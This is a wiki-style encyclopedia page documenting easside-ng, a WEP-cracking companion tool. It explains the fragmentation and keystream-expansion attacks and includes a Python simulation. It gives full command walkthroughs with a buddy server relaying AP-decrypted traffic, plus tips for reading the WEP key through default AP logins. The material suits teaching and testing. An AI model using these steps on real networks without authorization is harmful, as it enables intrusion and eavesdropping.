Easside-ng
From the Wardriving-Forum.de encyclopedia
Description
Function: Easside-ng is a tool that allows automatic communication with a router without knowing the WEP key.
Easside-ng performs a fake authentication followed by a fragmentation attack; after that you are connected at the MAC level. As with an ordinary client, the DHCP request comes next. We can send it too, because the fragmentation attack has given us a complete keystream, so encrypting is possible.
Of course we cannot decrypt the DHCP server's reply directly, so we use the known keystream to build a new IP packet that is addressed to the public IP of our buddy server.
The payload of that packet is the DHCP server's reply. We send the packet to the AP, which decrypts it for us and forwards it unencrypted to the buddy server. The buddy server in turn passes it on to easside-ng, so we now know the plaintext reply of the DHCP server. In exactly this way we can work in the network at will, since everything can be decrypted via AP->buddy->easside. The latency is not the best (it depends on the round trip AP->buddy->easside), but the network is usable.
It first identifies a network, then proceeds to associate with it, obtains PRGA (pseudo random generation algorithm) xor data, determines the network IP scheme and then sets up a TAP interface so that you can communicate with the AP without requiring the WEP key. All this is done without your intervention.
There are two primary papers of interest: "The Fragmentation Attack in Practice" by Andrea Bittau and "The Final Nail in WEP's Coffin" by Andrea Bittau, Mark Handley and Joshua Lackey. See the [page] for these papers and more. The referenced documents provide excellent background information if you would like to understand the underlying methodologies. The concepts for the fragmentation attack currently incorporated in aircrack-ng came from these papers.
Access to the wireless network without knowing the WEP key is achieved by having the AP itself decrypt the packets. This is done by running a "buddy" process on a server reachable on the Internet. This "buddy" server echoes the decrypted packets back to the system running easside-ng. This imposes a number of critical requirements for easside-ng to work:
* The target access point must be able to communicate with the Internet.
* A "buddy" server must exist on the Internet without firewalling of the port used by easside-ng. The default is TCP and UDP port 6969.
* The system running easside-ng must have access to the Internet and be able to communicate with the "buddy" server.
There are two general phases:
* Establishing the connection to the network.
* Communicating with the network.
Both are described in more detail below.
Establishing the connection
Easside-ng works through the following steps during the connection phase:
- It channel-hops, looking for a WEP network.
- When a network is found, easside-ng tries to authenticate to it.
- After successful authentication, the tool tries to associate with the AP.
- Once a single data packet has been sniffed, easside-ng tries to obtain at least 1504 bytes of PRGA. This is known as the fragmentation attack. The PRGA is written to prga.log.
- The IP network is then decrypted: using multicast frames and the linear keystream expansion technique, the next four bytes of PRGA are obtained.
Decrypting the ARP request reveals the network scheme, which is needed to build the ARP request for injection. Easside-ng can also use an IP packet to determine the network scheme; this just takes somewhat longer.
- easside-ng establishes a permanent TCP connection to the buddy server and checks connectivity.
- It ARPs for the MAC addresses of the router and of the source IP. The defaults are .1 for the router IP and .123 for the client IP.
- It tests connectivity via the access point and determines the Internet IP address of the AP.
It also lists the round-trip time of the test packets, which gives an impression of the connection quality.
- The TAP interface is then created.
At this point we run
ifconfig at0 up
and can communicate with every host on the WLAN via the TAP interface. Keep in mind that the WEP key is not needed for this! The TAP interface is a virtual interface that behaves exactly as if it were the madwifi interface with the correct WEP key. We can assign IPs, use DHCP and so on.
What role does the buddy server play?
I will try to explain the principle briefly.
* We sniff an encrypted packet over WLAN.
* If that packet were going to google.de, it would arrive there in plaintext; the Internet does not use WEP.
* The basic idea is to send the packet back out, but instead of to its original address, we send it to the buddy server on the Internet.
* The buddy server receives the packet decrypted, as plaintext, and sends it back to us.
Communication with the WIFI network
The following describes this diagram in more detail.
(Diagram: Beispiel.jpg)
So you may be asking "What is the magic? How can you access the WIFI network without knowing the WEP key?". The method is quite simple yet ingenious.
Let's look at the details of sending and receiving packets via the at0 TAP interface.
Sending packets:
* A packet is given to at0 (the TAP interface) based on the local network routing table. Depending on what destination IP address you are trying to communicate with, you may have to manually add static routing entries. By default, the wifi network is added to the routing table for you.
* The TAP interface hands the packet over to easside-ng.
* Easside-ng then encrypts it for injection using the PRGA gathered in the initial connectivity phase.
* Easside-ng then injects the packet into the wifi network via the wireless device.
Receiving packets:
* A source device (wired or wireless) sends a packet destined for the IP assigned to the at0 (TAP) interface or to a broadcast destination. The AP transmits the packet into the air.
* Easside-ng constantly listens to the packets being transmitted by the AP. It then processes packets addressed to the TAP IP (based on the MAC address) or to broadcast.
* Each packet it needs to process must first be decrypted. This is done in multiple steps, which follow.
* Easside-ng creates a new packet composed of two fragments. The first fragment has no data; it simply carries the destination IP of the buddy server. This fragment is encrypted using the PRGA (keystream). The second fragment contains the packet to be decrypted. Since this packet is already encrypted, it is used "as is". This new packet, consisting of two fragments, is then injected into the wifi network.
* The AP receives the fragmented packet, decrypts each fragment and reassembles the fragments into a single packet. Since the destination IP of the reassembled packet is the buddy server, it forwards it to the buddy server. Note that the AP was kind enough to decrypt the packet for you!
* The buddy server receives the decrypted packet from the AP by UDP. It then resends the decrypted information back to easside-ng.
* Easside-ng then sends the decrypted packet out the at0 (TAP) interface.
Fragmentation technique
This section provides a brief explanation of the fragmentation technique used in easside-ng.
This technique, when successful, can obtain 1504 bytes of PRGA (pseudo random generation algorithm). This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to encrypt packets you want to transmit. It requires at least one data packet to be received from the access point in order to initiate the attack.
Basically, the program obtains a small amount of keying material from the packet then attempts to send packets with known content to the access point (AP). If the packet is successfully echoed back by the AP then a larger amount of keying information can be obtained from the returned packet. This cycle is repeated several times until 1504 bytes of PRGA are obtained.
The original paper, "The Fragmentation Attack in Practice" by Andrea Bittau, provides a much more detailed technical description of the technique. A local copy is located [[1]]. Here are [slides] of a related paper. A local copy of the slides is located [[2]]. Also see the paper "The Final Nail in WEP's Coffin" on this page.
Linear keystream expansion technique
This section provides a brief explanation of the linear keystream expansion technique used in easside-ng.
So you may also be asking "What is the linear keystream expansion technique?". Its foundation is the fact that packets like an encrypted ARP request can easily be identified, combined with the fact that the start of such a packet is known plaintext.
The program first obtains the PRGA from the known-plaintext portion of the ARP request. Then it creates a new ARP request packet broken into two fragments. The first fragment is one byte longer than the known PRGA, and the PRGA for that extra byte is guessed. These guesses are sent and the program listens to see which one is replayed by the AP. The replayed packet has the correct PRGA, and this value was encoded in the destination multicast address. Now that the correct PRGA byte is known, one more byte of the original ARP request can be decrypted. This process is repeated until the sending IP in the original ARP request is decrypted. It takes a maximum of 256 guesses to determine the correct PRGA for a particular byte, and on average only 128.
The linear keystream expansion technique (Arbaugh inductive) is the reverse of chopchop. Chopchop decrypts packets from back to front; linear expansion decrypts packets from front to back. Strictly speaking, chopchop is the reverse of Arbaugh.
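Both the fragmentation attack and the linear keystream expansion rest on the same two properties of WEP: the RC4 keystream for a given IV can be recovered from known plaintext and reused to seal arbitrary data, and the ICV is an unkeyed CRC-32 that anyone can compute. The toy simulation below is an added example, not aircrack-ng code: the AP is modelled as an oracle that relays only frames whose ICV verifies, the key, IVs and ARP payload are constructed, and the three fragments per round are an assumption (it reproduces the 22 to 58 byte step in this page's sample output, since 3*(22-4)+4 = 58).

```python
import zlib

def rc4(key, n):
    """Plain RC4 keystream of n bytes; WEP seeds it with IV || key."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def icv(data):
    """WEP integrity value: an unkeyed CRC-32, so anyone can compute it."""
    return zlib.crc32(data).to_bytes(4, "little")

def wep_seal(iv, key, pt):  # frame body as a legitimate station or the AP sends it
    return xor(pt + icv(pt), rc4(iv + key, len(pt) + 4))

def ap_accepts(iv, key, body):
    """The AP as an oracle: only a frame whose ICV verifies is relayed."""
    data = xor(body, rc4(iv + key, len(body)))
    return len(data) > 4 and icv(data[:-4]) == data[-4:]

# Constructed sample values, not captured traffic.
KEY = bytes.fromhex("0102030405")             # toy 40-bit WEP key
IV, RELAY_IV = bytes.fromhex("4b0200"), bytes.fromhex("4c0200")  # IVs go in clear
SNAP_ARP = bytes.fromhex("aaaa030000000806")  # LLC/SNAP header of every ARP frame
ARP_BODY = bytes.fromhex("0001080006040001") + bytes(6) + bytes([192, 168, 1, 7])

def recover_keystream(body, known_pt):
    """Known plaintext XOR ciphertext = keystream bytes for that IV."""
    return xor(body[:len(known_pt)], known_pt)

def forge(ks, pt):
    """Seal new data with a recovered keystream; needs len(pt) + 4 <= len(ks)."""
    return xor(pt + icv(pt), ks)

def fragmentation_round(ks, iv, key, relay_iv, frags=3):
    """Send `frags` known fragments sealed with ks; the AP reassembles and relays
    them as one frame under its own IV, giving frags*(len(ks)-4)+4 keystream bytes."""
    chunk = bytes(len(ks) - 4)                     # largest payload ks can seal
    assert ap_accepts(iv, key, forge(ks, chunk)), "fragments must pass the ICV"
    payload = chunk * frags
    return xor(wep_seal(relay_iv, key, payload), payload + icv(payload))

def expand_one_byte(ks, iv, key):
    """Linear keystream expansion: of 256 guesses for byte len(ks), only the right one passes."""
    pt = bytes(len(ks) - 3)                        # pt + ICV is len(ks) + 1 bytes
    for guess in range(256):
        if ap_accepts(iv, key, forge(ks + bytes([guess]), pt)):
            return ks + bytes([guess])
    raise RuntimeError("no guess accepted")
```

The ICV is the only integrity check WEP has, so an AP cannot tell these forged fragments from legitimate traffic; no configuration setting closes this, only replacing WEP with WPA2 or WPA3 does.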
Easside-ng compared to Wesside-ng
The companion aircrack-ng suite program to easside-ng is wesside-ng. Here is a brief comparison of the two tools:
^ Feature ^ easside-ng ^ wesside-ng ^
| Stability of the program | Stable | Proof of concept |
| Finds a MAC address to spoof | No | Yes |
| Fake authentication to AP | Yes | Yes |
| Can use ARP packets for fragmentation | Yes | Yes |
| Can use IP packets for fragmentation | Yes | No |
| Fragmentation attack to obtain PRGA | Yes | Yes |
| Linear keystream expansion technique | Yes | Yes |
| Communication with wifi network without WEP key | Yes | No |
| Network ARP request flooding | No | Yes |
| Aircrack-ng PTW attack | No | Yes |
| Recovers WEP key | No | Yes |
Why easside-ng when aircrack-ng can already do PTW?
* easside-ng came out a year before PTW.
* easside-ng is practical for a fast and stealthy attack.
* It is significantly faster than PTW.
* It is an "instant tool" that requires no flooding.
Command
easside-ng <args>
Explanation:
* -h Displays the list of options.
* -v MAC address of the Access Point (Optional)
* -m Source MAC address to be used (Optional)
* -i Source IP address to be used on the wireless LAN. Defaults to the decoded network plus ".123" (Optional)
* -r IP address of the AP router. This could be the WAN IP of the AP or an actual router IP depending on the topology. Defaults to the decoded network plus ".1". (Optional)
* -s IP address of the "buddy" server (Mandatory)
* -f Wireless interface name. (Mandatory)
* -c Locks the card to the specified channel (Optional)
buddy-ng
Note: buddy-ng takes no parameters. Buddy-ng listens on TCP port 6969 and UDP port 6969. TCP is used for the persistent connection between easside-ng and buddy-ng. UDP is used to receive the decrypted packets from the AP.
As soon as easside-ng is started, a prga.log file is automatically created in the current directory:
* prga.log - contains the PRGA from the fragmentation attack.
Note: be sure to delete prga.log when a different target AP is to be used.
Example
Specific AP Usage Example
Be sure to use airmon-ng to put your card into monitor mode.
First, you need to start a buddy server. This needs to be located on the Internet and be accessible from the system running easside-ng via TCP. It must also be accessible from the AP via UDP. Port 6969 cannot be firewalled on it.
You start the buddy server:
buddy-ng
It responds:
buddy-ng Waiting for connexion
When easside-ng connects, it responds similar to:
Got connection from 10.113.65.187
Handshake complete
Inet check by 10.113.65.187 1
The IP 10.113.65.187 above is the IP of the system running easside-ng.
Now run easside-ng:
easside-ng -f ath0 -v 00:14:6C:7E:40:80 -c 9 -s 10.116.23.144
Where:
* -f ath0 This is the wireless interface name.
* -v 00:14:6C:7E:40:80 This is the MAC address of the AP.
* -c 9 This is the channel the AP is on.
* -s 10.116.23.144 This is the buddy server IP.
The system responds:
Setting tap MTU
Sorting out wifi MAC
MAC is 00:08:D4:86:7E:98
Setting tap MAC
[14:40:06.596419] Ownin...
SSID teddy Chan 9 Mac 00:14:6C:7E:40:80
Sending auth request
Authenticated
Sending assoc request
Associated: 1
Assuming ARP 54
[14:40:13.537842] Got 22 bytes of PRGA IV [4B:02:00]
[14:40:13.545021] Got 58 bytes of PRGA IV [4C:02:00]
[14:40:13.648670] Got 166 bytes of PRGA IV [4D:02:00]
[14:40:13.753087] Got 490 bytes of PRGA IV [4E:02:00]
[14:40:13.863819] Got 1462 bytes of PRGA IV [4F:02:00]
[14:40:13.966753] Got 1504 bytes of PRGA IV [50:02:00]
Assuming ARP 36
[15:23:42.047332] Guessing prga byte 22 with 16
ARP IP so far: 192
[15:23:42.749330] Guessing prga byte 23 with 3F
ARP IP so far: 192.168
[15:23:43.815329] Guessing prga byte 24 with 60
ARP IP so far: 192.168.1
My IP 192.168.1.123
Rtr IP 192.168.1.1
Sending who has 192.168.1.1 tell 192.168.1.123
Rtr MAC 00:14:6C:7E:40:80
Trying to connect to buddy: 10.116.23.144:6969
Connected
Handshake compl33t
Checking for internet... 1
Internet w0rx. Public IP 10.113.65.187 Rtt 77ms
At this point, you need to bring up the TAP interface:
ifconfig at0 up
Now you can send and receive packets to and from the AP network, which in this case is 192.168.1.0/24, via the at0 interface. Notice that you don't need a WEP key to do this! The TAP interface is a virtual interface that acts as if it were the wifi interface with the correct WEP key configured. You can assign an IP, use DHCP with it and so on. By default, the at0 interface is assigned the network obtained at the start plus ".123".
Scanning for APs Usage Example
The "Specific AP Usage Example" is for targeting a single Access Point on a specific channel. You can also let easside-ng scan for APs by using "easside-ng -f ath0 -s 10.116.23.144".
Usage Tips
Combining easside-ng and wesside-ng
As you may know, wesside-ng is a proof-of-concept tool which is rich in functionality, but is not as stable and bug-free compared to easside-ng. You can combine the strengths of wesside-ng and easside-ng together.
First run easside-ng to obtain the prga file. Then run wesside-ng to flood the network and obtain the WEP key. It is really that simple!
Playfully, this is known as "besside-ng".
Demonstrating Insecurity!
IMPORTANT: You must have written permission from the owner of the AP prior to using the instructions in this section. It is illegal to access networks which do not belong to you.
A clever way to demonstrate the insecurity of WEP networks and access points:
* Use easside-ng to create an access mechanism to the WIFI network.
* Log into the AP with your favourite browser. 99% of the time, the APs have default IDs and passwords. Many times there are no passwords set. Once logged into the AP, you can go to the WEP settings page and read off the WEP key from the configuration page. In some cases, where there are asterisks (*) for the key, you may need to look at the HTML source or use a tool to reveal the password.
* Now you can configure your wireless card with the WEP key and access the network normally.
Test Setup
This section will discuss what works and what does not work with regards to testing easside-ng against your own wireless LAN.
6969 is the standard port used by easside-ng and buddy-ng. If you change it, then of course, use the revised port number in all references below.
First, some simple assumptions about your wireless LAN:
* It has access to the Internet.
* Outbound UDP port 6969 to the Internet is not blocked. Some firewalls only allow communication on ports which have been explicitly allowed.
* You have tested your ability to connect to the buddy-ng server. See how to perform this test below.
Assumptions about your buddy-ng server:
* It is running on the Internet with a routable IP address.
* It is accessible by both the system running easside-ng and the wireless LAN.
* Inbound and outbound UDP and TCP port 6969 is permitted.
Assumptions about the system running easside-ng:
* It is running on the Internet with a routable IP address.
* Outbound TCP port 6969 to the Internet is not blocked. Some firewalls only allow communication on ports which have been explicitly allowed.
* You have tested your ability to connect to the buddy-ng server. See how to perform this test below.
* It contains a wireless device supported by aircrack-ng, and that device is in monitor mode.
The easiest way to test connectivity to the buddy-ng server is by using telnet. Be sure to start your buddy server process prior to doing this test! Otherwise it will fail for sure.
Enter:
telnet <ip of buddy server> 6969
The system should respond:
Trying <ip of buddy server>...
Connected to <ip of buddy server>.
Escape character is '^]'.
The buddy server should look like this:
Waiting for connexion
Got connection from <ip of the easside-ng system>
When you terminate the telnet session, it should look like this:
That was it
Waiting for connexion
The above examples show a successful test. If your test fails then use tcpdump or wireshark on the source and destination systems to sniff port 6969. Determine the problem with these tools and others then correct the root problem.
If you are running easside-ng and buddy-ng on the same system, then that system must have a routable Internet IP address. You cannot be on a LAN behind a firewall which does network address translation (NAT).
The ideal situation is to have the buddy-ng server running on a separate system someplace on the Internet. Then have a second system with easside-ng running with a routeable IP address.
Tap interface under Windows
To obtain a tap interface in a MS Windows environment, install OpenVPN.
Troubleshooting
* Is your card in monitor mode?
* Can your card inject? Check this with the aireplay-ng injection test. Is there a connection between the card and the AP?
* Can your card perform a fragmentation attack? Check this with the aireplay-ng injection test.
* Make sure to delete **prga.log** if you are changing access points or if you want to restart cleanly. In general, if you have problems, it is a good idea to delete it.
* There are a few known limitations:
  * Only open authentication is supported. Shared key authentication is not supported.
  * Only B and G networks are supported.